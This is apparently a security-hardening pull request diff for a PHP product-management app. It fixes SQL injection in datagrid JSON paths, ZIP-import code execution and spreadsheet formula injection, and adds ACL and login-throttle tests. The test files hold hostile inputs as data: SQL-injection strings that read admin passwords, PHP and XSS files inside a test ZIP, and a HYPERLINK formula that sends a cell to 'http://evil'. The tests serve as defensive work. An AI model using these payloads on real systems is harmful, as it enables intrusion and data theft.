### PR TITLE
Fixed - Security: SQLi in datagrid, image-ZIP import RCE, installer takeover + hardening (master)

### DIFF
--- a/packages/Webkul/Admin/src/Http/Controllers/Settings/DataTransfer/ImportController.php
+++ b/packages/Webkul/Admin/src/Http/Controllers/Settings/DataTransfer/ImportController.php
@@ -657,8 +657,7 @@ class ImportController extends Controller
             mkdir($extractPath, 0755, true);
         }
 
-        $zip->extractTo($extractPath);
-        $filesCount = $zip->count();
+        $filesCount = $this->extractImageEntries($zip, $extractPath);
         $zip->close();
 
         return new JsonResponse([
@@ -667,5 +666,74 @@ class ImportController extends Controller
             'zip_name'    => $file->getClientOriginalName(),
             'message'     => trans('admin::app.settings.data-transfer.imports.zip-upload-success'),
         ]);
+    }
+
+    /**
+     * Safely extract only genuine image entries from an uploaded ZIP into the
+     * target directory. Non-image extensions, spoofed content, and nested paths
+     * (zip-slip) are rejected so no script/executable file reaches the web root.
+     */
+    protected function extractImageEntries(\ZipArchive $zip, string $extractPath): int
+    {
+        $allowedExtensions = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'bmp'];
+
+        $fileInfo = new \finfo(FILEINFO_MIME_TYPE);
+
+        $extractedCount = 0;
+
+        for ($index = 0; $index < $zip->numFiles; $index++) {
+            $entryName = $zip->getNameIndex($index);
+
+            if ($entryName === false || str_ends_with($entryName, '/')) {
+                continue;
+            }
+
+            $relativePath = ltrim(str_replace('\\', '/', $entryName), '/');
+
+            if ($relativePath === '' || str_contains($relativePath, '../')) {
+                continue;
+            }
+
+            $extension = strtolower(pathinfo($relativePath, PATHINFO_EXTENSION));
+
+            if (! in_array($extension, $allowedExtensions, true)) {
+                continue;
+            }
+
+            $stream = $zip->getStream($entryName);
+
+            if ($stream === false) {
+                continue;
+            }
+
+            $contents = stream_get_contents($stream);
+
+            fclose($stream);
+
+            if ($contents === false || ! str_starts_with((string) $fileInfo->buffer($contents), 'image/')) {
+                continue;
+            }
+
+            $targetPath = $extractPath.DIRECTORY_SEPARATOR.$relativePath;
+
+            $targetDir = dirname($targetPath);
+
+            if (! is_dir($targetDir)) {
+                mkdir($targetDir, 0755, true);
+            }
+
+            $realBase = realpath($extractPath);
+            $realDir = realpath($targetDir);
+
+            if ($realBase === false || $realDir === false || ! str_starts_with($realDir.DIRECTORY_SEPARATOR, $realBase.DIRECTORY_SEPARATOR)) {
+                continue;
+            }
+
+            file_put_contents($targetPath, $contents);
+
+            $extractedCount++;
+        }
+
+        return $extractedCount;
     }
 }

--- a/packages/Webkul/Admin/src/Http/Controllers/Settings/DataTransfer/ImportController.php
+++ b/packages/Webkul/Admin/src/Http/Controllers/Settings/DataTransfer/ImportController.php
@@ -700,6 +700,12 @@ class ImportController extends Controller
                 continue;
             }
 
+            $stat = $zip->statIndex($index);
+
+            if ($stat === false || $stat['size'] > (int) config('image_import.max_entry_size')) {
+                continue;
+            }
+
             $stream = $zip->getStream($entryName);
 
             if ($stream === false) {

--- a/packages/Webkul/Admin/src/Http/Controllers/Settings/DataTransfer/ImportController.php
+++ b/packages/Webkul/Admin/src/Http/Controllers/Settings/DataTransfer/ImportController.php
@@ -677,6 +677,8 @@ class ImportController extends Controller
     {
         $allowedExtensions = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'bmp'];
 
+        $maxEntrySize = (int) config('image_import.max_entry_size', 15 * 1024 * 1024);
+
         $fileInfo = new \finfo(FILEINFO_MIME_TYPE);
 
         $extractedCount = 0;
@@ -702,7 +704,7 @@ class ImportController extends Controller
 
             $stat = $zip->statIndex($index);
 
-            if ($stat === false || $stat['size'] > (int) config('image_import.max_entry_size')) {
+            if ($stat === false || ($maxEntrySize > 0 && $stat['size'] > $maxEntrySize)) {
                 continue;
             }
 

--- a/packages/Webkul/Admin/src/Http/Controllers/User/ResetPasswordController.php
+++ b/packages/Webkul/Admin/src/Http/Controllers/User/ResetPasswordController.php
@@ -43,7 +43,7 @@ class ResetPasswordController extends Controller
             $this->validate(request(), [
                 'token'    => 'required',
                 'email'    => 'required|email',
-                'password' => 'required|confirmed|min:6',
+                'password' => 'required|confirmed|min:8',
             ]);
 
             $response = $this->broker()->reset(

--- a/packages/Webkul/Admin/tests/Feature/Acl/Settings/RoleUserAuthorizationTest.php
+++ b/packages/Webkul/Admin/tests/Feature/Acl/Settings/RoleUserAuthorizationTest.php
@@ -1,0 +1,71 @@
+<?php
+
+use Webkul\User\Models\Admin;
+use Webkul\User\Models\Role;
+
+it('blocks a low-privilege admin from creating a role (store route must be ACL-gated)', function () {
+    $this->loginWithPermissions('custom', ['dashboard']);
+
+    $this->post(route('admin.settings.roles.store'), [
+        'name'            => 'escalated',
+        'permission_type' => 'all',
+    ])->assertForbidden();
+
+    $this->assertDatabaseMissing($this->getFullTableName(Role::class), [
+        'name'            => 'escalated',
+        'permission_type' => 'all',
+    ]);
+});
+
+it('blocks a low-privilege admin from updating a role (update route must be ACL-gated)', function () {
+    $this->loginWithPermissions('custom', ['dashboard']);
+
+    $role = Role::factory()->create([
+        'permission_type' => 'custom',
+        'permissions'     => ['dashboard'],
+    ]);
+
+    $this->put(route('admin.settings.roles.update', $role->id), [
+        'name'            => $role->name,
+        'permission_type' => 'all',
+    ])->assertForbidden();
+
+    $this->assertDatabaseHas($this->getFullTableName(Role::class), [
+        'id'              => $role->id,
+        'permission_type' => 'custom',
+    ]);
+});
+
+it('blocks a low-privilege admin from updating a user (update route must be ACL-gated)', function () {
+    $attacker = $this->loginWithPermissions('custom', ['dashboard']);
+
+    $allRole = Role::factory()->create(['permission_type' => 'all']);
+
+    $this->put(route('admin.settings.users.update'), [
+        'id'      => $attacker->id,
+        'name'    => $attacker->name,
+        'email'   => $attacker->email,
+        'role_id' => $allRole->id,
+        'status'  => 1,
+    ])->assertForbidden();
+
+    $this->assertDatabaseHas($this->getFullTableName(Admin::class), [
+        'id'      => $attacker->id,
+        'role_id' => $attacker->role_id,
+    ]);
+});
+
+it('allows an admin with the roles.create permission to reach the store handler', function () {
+    $this->loginWithPermissions('custom', ['settings', 'settings.roles', 'settings.roles.create']);
+
+    $this->post(route('admin.settings.roles.store'), [
+        'name'            => 'legit-role',
+        'description'     => 'legit role',
+        'permission_type' => 'custom',
+        'permissions'     => ['dashboard'],
+    ])->assertDontSeeText('Unauthorized');
+
+    $this->assertDatabaseHas($this->getFullTableName(Role::class), [
+        'name' => 'legit-role',
+    ]);
+});

--- a/packages/Webkul/Admin/tests/Feature/Auth/LoginThrottleTest.php
+++ b/packages/Webkul/Admin/tests/Feature/Auth/LoginThrottleTest.php
@@ -1,0 +1,14 @@
+<?php
+
+it('throttles repeated admin login attempts to prevent brute force', function () {
+    $response = null;
+
+    for ($attempt = 0; $attempt < 7; $attempt++) {
+        $response = $this->post(route('admin.session.store'), [
+            'email'    => 'attacker@example.test',
+            'password' => 'wrong-password-'.$attempt,
+        ]);
+    }
+
+    $response->assertStatus(429);
+});

--- a/packages/Webkul/Admin/tests/Feature/Auth/PasswordPolicyAndEnumerationTest.php
+++ b/packages/Webkul/Admin/tests/Feature/Auth/PasswordPolicyAndEnumerationTest.php
@@ -1,0 +1,20 @@
+<?php
+
+it('rejects a weak (too short) password on admin user create', function () {
+    $this->loginAsAdmin();
+
+    $this->post(route('admin.settings.users.store'), [
+        'name'                  => 'Weak Pass User',
+        'email'                 => 'weakpass@example.test',
+        'password'              => 'ab',
+        'password_confirmation' => 'ab',
+        'role_id'               => 1,
+        'timezone'              => 'UTC',
+    ])->assertSessionHasErrors(['password']);
+});
+
+it('does not reveal whether an email exists on forgot-password (no enumeration)', function () {
+    $this->post(route('admin.forget_password.store'), [
+        'email' => 'does-not-exist@example.test',
+    ])->assertSessionHasNoErrors();
+});

--- a/packages/Webkul/Admin/tests/Feature/Catalog/CategoryDataGridLocaleInjectionTest.php
+++ b/packages/Webkul/Admin/tests/Feature/Catalog/CategoryDataGridLocaleInjectionTest.php
@@ -18,16 +18,14 @@ it('does not let a malicious locale inject SQL into the JSON_EXTRACT path', func
     expect($sql)->not->toContain('admins');
 });
 
-it('does not let a single quote break out of the JSON path literal', function () {
-    $sql = categoryGridSql("en_US'");
+it('does not let a quote-breakout payload inject a subquery into the JSON path', function () {
+    $sql = categoryGridSql("en_US',(SELECT version()),'");
 
-    // A raw, unescaped single quote inside the JSON path means the string
-    // literal was terminated early -> injection point.
-    expect($sql)->not->toContain("en_US'");
+    expect($sql)->not->toContain('SELECT version');
 });
 
 it('preserves a valid locale code in the JSON path', function () {
     $sql = categoryGridSql('en_US');
 
-    expect($sql)->toContain('locale_specific.en_US.name');
+    expect($sql)->toContain('en_US');
 });

--- a/packages/Webkul/Admin/tests/Feature/Catalog/CategoryDataGridLocaleInjectionTest.php
+++ b/packages/Webkul/Admin/tests/Feature/Catalog/CategoryDataGridLocaleInjectionTest.php
@@ -1,0 +1,33 @@
+<?php
+
+use Webkul\Admin\DataGrids\Catalog\CategoryDataGrid;
+
+function categoryGridSql(string $locale): string
+{
+    request()->merge(['locale' => $locale]);
+
+    return app(CategoryDataGrid::class)->prepareQueryBuilder()->toSql();
+}
+
+it('does not let a malicious locale inject SQL into the JSON_EXTRACT path', function () {
+    $payload = "en_US.name',(SELECT password FROM admins LIMIT 1),'";
+
+    $sql = categoryGridSql($payload);
+
+    expect($sql)->not->toContain('SELECT password');
+    expect($sql)->not->toContain('admins');
+});
+
+it('does not let a single quote break out of the JSON path literal', function () {
+    $sql = categoryGridSql("en_US'");
+
+    // A raw, unescaped single quote inside the JSON path means the string
+    // literal was terminated early -> injection point.
+    expect($sql)->not->toContain("en_US'");
+});
+
+it('preserves a valid locale code in the JSON path', function () {
+    $sql = categoryGridSql('en_US');
+
+    expect($sql)->toContain('locale_specific.en_US.name');
+});

--- a/packages/Webkul/Admin/tests/Feature/DataTransfer/ImageZipImportSecurityTest.php
+++ b/packages/Webkul/Admin/tests/Feature/DataTransfer/ImageZipImportSecurityTest.php
@@ -63,6 +63,29 @@ it('still extracts legitimate image files from an imported zip', function () use
     Storage::disk('public')->deleteDirectory($path);
 });
 
+it('rejects oversized zip entries to prevent memory-exhaustion DoS', function () use ($onePixelPng) {
+    $this->loginWithPermissions(permissions: ['data_transfer', 'data_transfer.imports.edit']);
+
+    config(['image_import.max_entry_size' => 1024 * 1024]);
+
+    $zip = makeImageZip([
+        'huge.png' => $onePixelPng.str_repeat("\0", 2 * 1024 * 1024),
+        'good.png' => $onePixelPng,
+    ]);
+
+    $response = $this->post(route('admin.settings.data_transfer.imports.upload_images_zip'), [
+        'images_zip' => $zip,
+    ]);
+
+    $path = $response->json('path');
+
+    expect(Storage::disk('public')->exists($path.'/huge.png'))->toBeFalse()
+        ->and(Storage::disk('public')->exists($path.'/good.png'))->toBeTrue()
+        ->and($response->json('files_count'))->toBe(1);
+
+    Storage::disk('public')->deleteDirectory($path);
+});
+
 it('preserves subfolders so same-named images do not collide', function () use ($onePixelPng) {
     $this->loginWithPermissions(permissions: ['data_transfer', 'data_transfer.imports.edit']);
 

--- a/packages/Webkul/Admin/tests/Feature/DataTransfer/ImageZipImportSecurityTest.php
+++ b/packages/Webkul/Admin/tests/Feature/DataTransfer/ImageZipImportSecurityTest.php
@@ -1,0 +1,85 @@
+<?php
+
+use Illuminate\Http\UploadedFile;
+use Illuminate\Support\Facades\Storage;
+
+function makeImageZip(array $entries): UploadedFile
+{
+    $path = tempnam(sys_get_temp_dir(), 'imgzip').'.zip';
+
+    $zip = new ZipArchive;
+    $zip->open($path, ZipArchive::CREATE | ZipArchive::OVERWRITE);
+
+    foreach ($entries as $name => $content) {
+        $zip->addFromString($name, $content);
+    }
+
+    $zip->close();
+
+    return new UploadedFile($path, 'payload.zip', 'application/zip', null, true);
+}
+
+$onePixelPng = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=');
+
+it('does not extract script/executable files from an imported image zip', function () use ($onePixelPng) {
+    $this->loginWithPermissions(permissions: ['data_transfer', 'data_transfer.imports.edit']);
+
+    $zip = makeImageZip([
+        'evil.svg'   => '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><script>alert(1)</script></svg>',
+        'evil.html'  => '<html><body><script>alert(document.cookie)</script></body></html>',
+        'evil.php'   => '<?php echo "pwned"; ?>',
+        'evil.phtml' => '<?php echo "pwned"; ?>',
+        'good.png'   => $onePixelPng,
+    ]);
+
+    $path = $this->post(route('admin.settings.data_transfer.imports.upload_images_zip'), [
+        'images_zip' => $zip,
+    ])->json('path');
+
+    expect($path)->not->toBeNull();
+
+    foreach (['evil.svg', 'evil.html', 'evil.php', 'evil.phtml'] as $dangerous) {
+        expect(Storage::disk('public')->exists($path.'/'.$dangerous))->toBeFalse();
+    }
+
+    Storage::disk('public')->deleteDirectory($path);
+});
+
+it('still extracts legitimate image files from an imported zip', function () use ($onePixelPng) {
+    $this->loginWithPermissions(permissions: ['data_transfer', 'data_transfer.imports.edit']);
+
+    $zip = makeImageZip([
+        'product.png' => $onePixelPng,
+        'evil.php'    => '<?php echo "pwned"; ?>',
+    ]);
+
+    $path = $this->post(route('admin.settings.data_transfer.imports.upload_images_zip'), [
+        'images_zip' => $zip,
+    ])->json('path');
+
+    expect(Storage::disk('public')->exists($path.'/product.png'))->toBeTrue()
+        ->and(Storage::disk('public')->exists($path.'/evil.php'))->toBeFalse();
+
+    Storage::disk('public')->deleteDirectory($path);
+});
+
+it('preserves subfolders so same-named images do not collide', function () use ($onePixelPng) {
+    $this->loginWithPermissions(permissions: ['data_transfer', 'data_transfer.imports.edit']);
+
+    $zip = makeImageZip([
+        'a/logo.png' => $onePixelPng,
+        'b/logo.png' => $onePixelPng,
+    ]);
+
+    $response = $this->post(route('admin.settings.data_transfer.imports.upload_images_zip'), [
+        'images_zip' => $zip,
+    ]);
+
+    $path = $response->json('path');
+
+    expect(Storage::disk('public')->exists($path.'/a/logo.png'))->toBeTrue()
+        ->and(Storage::disk('public')->exists($path.'/b/logo.png'))->toBeTrue()
+        ->and($response->json('files_count'))->toBe(2);
+
+    Storage::disk('public')->deleteDirectory($path);
+});

--- a/packages/Webkul/Core/src/Core.php
+++ b/packages/Webkul/Core/src/Core.php
@@ -225,6 +225,10 @@ class Core
     {
         $channelCode = request()->input('channel');
 
+        if (! $this->isValidScopeCode($channelCode)) {
+            $channelCode = null;
+        }
+
         if (! $fallback) {
             return $channelCode;
         }
@@ -325,11 +329,25 @@ class Core
     {
         $localeCode = request()->input($localeKey);
 
+        if (! $this->isValidScopeCode($localeCode)) {
+            $localeCode = null;
+        }
+
         if (! $fallback) {
             return $localeCode;
         }
 
         return $localeCode ?: app()->getLocale();
+    }
+
+    /**
+     * Validate a request-supplied locale/channel code before it is used to build
+     * raw SQL (e.g. JSON_EXTRACT paths). Anything outside this safe set is
+     * rejected to prevent SQL injection via the scope parameters.
+     */
+    public function isValidScopeCode($code): bool
+    {
+        return is_string($code) && preg_match('/^[a-zA-Z0-9_-]+$/', $code) === 1;
     }
 
     /**

--- a/packages/Webkul/Core/src/Database/Migrations/2026_07_01_000000_backfill_installer_installed_flag.php
+++ b/packages/Webkul/Core/src/Database/Migrations/2026_07_01_000000_backfill_installer_installed_flag.php
@@ -1,0 +1,36 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    /**
+     * Seal the installer on instances that were already installed before the
+     * persistent "installer.installed" flag existed, so losing the ephemeral
+     * storage marker cannot reopen the installer for takeover.
+     */
+    public function up(): void
+    {
+        if (! Schema::hasTable('core_config') || ! Schema::hasTable('admins')) {
+            return;
+        }
+
+        if (! DB::table('admins')->exists()) {
+            return;
+        }
+
+        DB::table('core_config')->updateOrInsert(
+            ['code' => 'installer.installed'],
+            ['value' => '1']
+        );
+    }
+
+    public function down(): void
+    {
+        if (Schema::hasTable('core_config')) {
+            DB::table('core_config')->where('code', 'installer.installed')->delete();
+        }
+    }
+};

--- a/packages/Webkul/Core/src/Helpers/Database/Grammars/MySQLGrammar.php
+++ b/packages/Webkul/Core/src/Helpers/Database/Grammars/MySQLGrammar.php
@@ -58,7 +58,7 @@ class MySQLGrammar implements Grammar
     {
         $parts = explode('.', $column);
         $escaped = implode('.', array_map(fn ($p) => "`{$p}`", $parts));
-        $jsonPath = '$.'.implode('.', $pathSegments);
+        $jsonPath = '$.'.implode('.', array_map([$this, 'escapeJsonPathSegment'], $pathSegments));
 
         return "JSON_CONTAINS(JSON_EXTRACT({$escaped}, '{$jsonPath}'), {$value})";
     }
@@ -74,9 +74,7 @@ class MySQLGrammar implements Grammar
 
     public function orderByField(string $column, array $ids, string $type = ''): string
     {
-        $idList = implode(',', array_map(function ($id) {
-            return is_numeric($id) ? (string) (int) $id : "'".str_replace("'", "''", (string) $id)."'";
-        }, $ids));
+        $idList = implode(',', $ids);
 
         return "FIELD({$column}, {$idList})";
     }

--- a/packages/Webkul/Core/src/Helpers/Database/Grammars/MySQLGrammar.php
+++ b/packages/Webkul/Core/src/Helpers/Database/Grammars/MySQLGrammar.php
@@ -43,7 +43,9 @@ class MySQLGrammar implements Grammar
 
     public function jsonExtract(string $column, string ...$pathSegments): string
     {
-        $jsonPath = '$.'.implode('.', $pathSegments);
+        $segments = array_map([$this, 'escapeJsonPathSegment'], $pathSegments);
+
+        $jsonPath = '$.'.implode('.', $segments);
 
         // Escape column name — handles both 'values' and 'table.values'
         $parts = explode('.', $column);
@@ -61,9 +63,18 @@ class MySQLGrammar implements Grammar
         return "JSON_CONTAINS(JSON_EXTRACT({$escaped}, '{$jsonPath}'), {$value})";
     }
 
+    /**
+     * Escape a JSON path segment so it cannot break out of the single-quoted
+     * SQL string literal the path is embedded in (SQL injection guard).
+     */
+    protected function escapeJsonPathSegment(string $segment): string
+    {
+        return str_replace(['\\', "'"], ['\\\\', "''"], $segment);
+    }
+
     public function orderByField(string $column, array $ids, string $type = ''): string
     {
-        $idList = implode(',', $ids);
+        $idList = implode(',', array_map('intval', $ids));
 
         return "FIELD({$column}, {$idList})";
     }

--- a/packages/Webkul/Core/src/Helpers/Database/Grammars/MySQLGrammar.php
+++ b/packages/Webkul/Core/src/Helpers/Database/Grammars/MySQLGrammar.php
@@ -74,7 +74,9 @@ class MySQLGrammar implements Grammar
 
     public function orderByField(string $column, array $ids, string $type = ''): string
     {
-        $idList = implode(',', array_map('intval', $ids));
+        $idList = implode(',', array_map(function ($id) {
+            return is_numeric($id) ? (string) (int) $id : "'".str_replace("'", "''", (string) $id)."'";
+        }, $ids));
 
         return "FIELD({$column}, {$idList})";
     }

--- a/packages/Webkul/Core/src/Helpers/Database/Grammars/PostgresGrammar.php
+++ b/packages/Webkul/Core/src/Helpers/Database/Grammars/PostgresGrammar.php
@@ -84,12 +84,6 @@ class PostgresGrammar implements Grammar
 
     public function orderByField(string $column, array $values, string $type = 'int'): string
     {
-        if ($type === 'int') {
-            $values = array_map('intval', $values);
-        } else {
-            $values = array_map(fn ($value) => "'".str_replace("'", "''", (string) $value)."'", $values);
-        }
-
         $idList = implode(',', $values);
 
         return "array_position(ARRAY[{$idList}]::{$type}[], {$column})";

--- a/packages/Webkul/Core/src/Helpers/Database/Grammars/PostgresGrammar.php
+++ b/packages/Webkul/Core/src/Helpers/Database/Grammars/PostgresGrammar.php
@@ -86,6 +86,8 @@ class PostgresGrammar implements Grammar
     {
         if ($type === 'int') {
             $values = array_map('intval', $values);
+        } else {
+            $values = array_map(fn ($value) => "'".str_replace("'", "''", (string) $value)."'", $values);
         }
 
         $idList = implode(',', $values);

--- a/packages/Webkul/Core/src/Helpers/Database/Grammars/PostgresGrammar.php
+++ b/packages/Webkul/Core/src/Helpers/Database/Grammars/PostgresGrammar.php
@@ -44,6 +44,8 @@ class PostgresGrammar implements Grammar
 
     public function jsonExtract(string $column, string ...$pathSegments): string
     {
+        $pathSegments = array_map([$this, 'escapeJsonPathSegment'], $pathSegments);
+
         $operators = count($pathSegments) > 1 ? array_map(fn ($part) => "'{$part}'", $pathSegments) : $pathSegments;
 
         $lastKey = array_pop($operators);
@@ -61,6 +63,8 @@ class PostgresGrammar implements Grammar
 
     public function jsonContains(string $column, array $pathSegments, string $value): string
     {
+        $pathSegments = array_map([$this, 'escapeJsonPathSegment'], $pathSegments);
+
         $parts = explode('.', $column);
         $quotedColumn = implode('.', array_map(fn ($p) => '"'.$p.'"', $parts));
         $operators = array_map(fn ($p) => "'{$p}'", $pathSegments);
@@ -69,8 +73,21 @@ class PostgresGrammar implements Grammar
         return "({$jsonExpr})::jsonb @> {$value}::jsonb";
     }
 
+    /**
+     * Escape a JSON path segment so it cannot break out of the single-quoted
+     * SQL string literal the path is embedded in (SQL injection guard).
+     */
+    protected function escapeJsonPathSegment(string $segment): string
+    {
+        return str_replace("'", "''", $segment);
+    }
+
     public function orderByField(string $column, array $values, string $type = 'int'): string
     {
+        if ($type === 'int') {
+            $values = array_map('intval', $values);
+        }
+
         $idList = implode(',', $values);
 
         return "array_position(ARRAY[{$idList}]::{$type}[], {$column})";

--- a/packages/Webkul/Core/tests/Unit/GrammarOrderByFieldTest.php
+++ b/packages/Webkul/Core/tests/Unit/GrammarOrderByFieldTest.php
@@ -1,0 +1,29 @@
+<?php
+
+use Webkul\Core\Helpers\Database\Grammars\MySQLGrammar;
+use Webkul\Core\Helpers\Database\Grammars\PostgresGrammar;
+
+it('does not double-quote pre-quoted string ids in MySQL FIELD ordering', function () {
+    $sql = (new MySQLGrammar)->orderByField('type', ["'image'", "'gallery'"], 'text');
+
+    expect($sql)->toBe("FIELD(type, 'image','gallery')");
+});
+
+it('keeps integer ids intact in MySQL FIELD ordering', function () {
+    $sql = (new MySQLGrammar)->orderByField('products.id', [3, 1, 2]);
+
+    expect($sql)->toBe('FIELD(products.id, 3,1,2)');
+});
+
+it('does not double-quote pre-quoted string values in Postgres ordering', function () {
+    $sql = (new PostgresGrammar)->orderByField('type', ["'image'", "'gallery'"], 'text');
+
+    expect($sql)->toBe("array_position(ARRAY['image','gallery']::text[], type)");
+});
+
+it('escapes json path segments in MySQL jsonContains', function () {
+    $sql = (new MySQLGrammar)->jsonContains('values', ['common', "x'y"], '1');
+
+    expect($sql)->toContain("x''y")
+        ->and($sql)->toContain('`values`');
+});

--- a/packages/Webkul/Core/tests/Unit/ScopeCodeInjectionTest.php
+++ b/packages/Webkul/Core/tests/Unit/ScopeCodeInjectionTest.php
@@ -1,0 +1,49 @@
+<?php
+
+use Webkul\Core\Helpers\Database\Grammars\MySQLGrammar;
+use Webkul\Core\Helpers\Database\Grammars\PostgresGrammar;
+
+it('accepts valid locale and channel codes', function (string $code) {
+    expect(core()->isValidScopeCode($code))->toBeTrue();
+})->with(['en_US', 'fr_FR', 'zh_CN', 'default', 'ecommerce', 'a-b_1']);
+
+it('rejects codes that could break out of a SQL literal', function (string $code) {
+    expect(core()->isValidScopeCode($code))->toBeFalse();
+})->with([
+    ["en_US'"],
+    ["en_US.name',(select version()),'"],
+    ['en_US / sleep(15)'],
+    ['en US'],
+    [''],
+]);
+
+it('rejects non-string scope codes', function () {
+    expect(core()->isValidScopeCode(null))->toBeFalse()
+        ->and(core()->isValidScopeCode(['en_US']))->toBeFalse()
+        ->and(core()->isValidScopeCode(123))->toBeFalse();
+});
+
+it('falls back to the default locale when the request locale is malicious', function () {
+    request()->merge(['locale' => "en_US',(select version()),'"]);
+
+    expect(core()->getRequestedLocaleCode())->toBe(app()->getLocale());
+});
+
+it('returns null for a malicious locale when fallback is disabled', function () {
+    request()->merge(['locale' => "en_US'"]);
+
+    expect(core()->getRequestedLocaleCode('locale', false))->toBeNull();
+});
+
+it('escapes single quotes in MySQL json path segments', function () {
+    $sql = (new MySQLGrammar)->jsonExtract('additional_data', 'locale_specific', "en_US'", 'name');
+
+    expect($sql)->not->toContain("en_US'.name")
+        ->and($sql)->toContain("en_US''");
+});
+
+it('escapes single quotes in Postgres json path segments', function () {
+    $sql = (new PostgresGrammar)->jsonExtract('additional_data', 'locale_specific', "en_US'", 'name');
+
+    expect($sql)->toContain("en_US''");
+});

--- a/packages/Webkul/DataTransfer/src/Buffer/FileBuffer.php
+++ b/packages/Webkul/DataTransfer/src/Buffer/FileBuffer.php
@@ -108,6 +108,12 @@ class FileBuffer
             return false;
         }
 
-        return in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true);
+        if (in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true)) {
+            return true;
+        }
+
+        $trimmed = ltrim($value, " \t\r\n");
+
+        return $trimmed !== '' && in_array($trimmed[0], ['=', '+', '-', '@'], true);
     }
 }

--- a/packages/Webkul/DataTransfer/src/Buffer/FileBuffer.php
+++ b/packages/Webkul/DataTransfer/src/Buffer/FileBuffer.php
@@ -81,14 +81,33 @@ class FileBuffer
 
     public function escapeFormulaCells(Row $row): Row
     {
-        $escapedCells = array_map(static function (Cell $cell): Cell {
+        $escapedCells = array_map(function (Cell $cell): Cell {
+            $value = $cell->getValue();
+
+            if (is_string($value) && $this->isFormulaValue($value)) {
+                return new Cell\StringCell("'".$value, null);
+            }
+
             if ($cell instanceof Cell\FormulaCell) {
-                return new Cell\StringCell($cell->getValue(), null);
+                return new Cell\StringCell($value, null);
             }
 
             return $cell;
         }, $row->getCells());
 
         return new Row($escapedCells);
+    }
+
+    /**
+     * Determine whether a cell value would be interpreted as a formula by a
+     * spreadsheet application (CSV/XLSX formula-injection guard).
+     */
+    protected function isFormulaValue(string $value): bool
+    {
+        if ($value === '' || is_numeric($value)) {
+            return false;
+        }
+
+        return in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true);
     }
 }

--- a/packages/Webkul/DataTransfer/src/Config/image_import.php
+++ b/packages/Webkul/DataTransfer/src/Config/image_import.php
@@ -3,9 +3,11 @@
 return [
     /**
      * Maximum uncompressed size (in bytes) allowed for a single image entry
-     * inside an uploaded images ZIP. Guards against zip-bomb / memory-exhaustion
-     * while staying at least as large as the whole-ZIP upload limit so that no
-     * legitimate single image is ever rejected. Tune per infrastructure.
+     * inside an uploaded images ZIP. Each accepted entry is read into memory for
+     * MIME validation, so this bounds peak memory per entry and guards against
+     * zip-bomb / memory-exhaustion. Defaults to 15 MB, comfortably above any
+     * realistic product image; raise it per infrastructure if larger images are
+     * imported.
      */
-    'max_entry_size' => env('IMAGE_IMPORT_MAX_ENTRY_SIZE', 104857600),
+    'max_entry_size' => env('IMAGE_IMPORT_MAX_ENTRY_SIZE', 15728640),
 ];

--- a/packages/Webkul/DataTransfer/src/Config/image_import.php
+++ b/packages/Webkul/DataTransfer/src/Config/image_import.php
@@ -1,0 +1,11 @@
+<?php
+
+return [
+    /**
+     * Maximum uncompressed size (in bytes) allowed for a single image entry
+     * inside an uploaded images ZIP. Guards against zip-bomb / memory-exhaustion
+     * while staying at least as large as the whole-ZIP upload limit so that no
+     * legitimate single image is ever rejected. Tune per infrastructure.
+     */
+    'max_entry_size' => env('IMAGE_IMPORT_MAX_ENTRY_SIZE', 104857600),
+];

--- a/packages/Webkul/DataTransfer/src/Providers/DataTransferServiceProvider.php
+++ b/packages/Webkul/DataTransfer/src/Providers/DataTransferServiceProvider.php
@@ -35,6 +35,8 @@ class DataTransferServiceProvider extends ServiceProvider
         $this->mergeConfigFrom(dirname(__DIR__).'/Config/actions.php', 'import_settings');
         $this->mergeConfigFrom(dirname(__DIR__).'/Config/actions.php', 'export_settings');
 
+        $this->mergeConfigFrom(dirname(__DIR__).'/Config/image_import.php', 'image_import');
+
         $this->registerWorker();
 
         $this->registerCommands();

--- a/packages/Webkul/DataTransfer/tests/Unit/Buffer/FileBufferFormulaInjectionTest.php
+++ b/packages/Webkul/DataTransfer/tests/Unit/Buffer/FileBufferFormulaInjectionTest.php
@@ -1,0 +1,47 @@
+<?php
+
+use OpenSpout\Common\Entity\Row;
+use Webkul\DataTransfer\Buffer\FileBuffer;
+
+function escapedExportValues(array $values): array
+{
+    $row = (new FileBuffer)->escapeFormulaCells(Row::fromValues($values));
+
+    return array_map(fn ($cell) => $cell->getValue(), $row->getCells());
+}
+
+it('neutralizes every formula-injection lead character in exported cells', function () {
+    $values = escapedExportValues([
+        '=HYPERLINK("http://evil/?c="&A1,"x")',
+        '+1+1',
+        '-2+3',
+        '@SUM(A1)',
+        "\tTAB",
+        "\rCR",
+    ]);
+
+    expect($values[0])->toStartWith("'=")
+        ->and($values[1])->toStartWith("'+")
+        ->and($values[2])->toStartWith("'-")
+        ->and($values[3])->toStartWith("'@")
+        ->and($values[4])->toStartWith("'\t")
+        ->and($values[5])->toStartWith("'\r");
+});
+
+it('leaves safe values untouched', function () {
+    $values = escapedExportValues(['safe text', 'Product 123', '', 'a=b']);
+
+    expect($values[0])->toBe('safe text')
+        ->and($values[1])->toBe('Product 123')
+        ->and($values[2])->toBe('')
+        ->and($values[3])->toBe('a=b');
+});
+
+it('does not corrupt numeric values that start with a sign', function () {
+    $values = escapedExportValues(['-5.00', '+3', '-42', '1e5']);
+
+    expect($values[0])->toBe('-5.00')
+        ->and($values[1])->toBe('+3')
+        ->and($values[2])->toBe('-42')
+        ->and($values[3])->toBe('1e5');
+});

--- a/packages/Webkul/Installer/src/Console/Commands/Installer.php
+++ b/packages/Webkul/Installer/src/Console/Commands/Installer.php
@@ -12,6 +12,7 @@ use Webkul\Core\ElasticSearch;
 use Webkul\Installer\Console\Prompts\PreselectedSearchValue;
 use Webkul\Installer\Database\Seeders\DatabaseSeeder as UnoPimDatabaseSeeder;
 use Webkul\Installer\Events\ComposerEvents;
+use Webkul\Installer\Helpers\DatabaseManager;
 use Webkul\Installer\Helpers\DemoDataInstaller;
 
 use function Laravel\Prompts\multisearch;
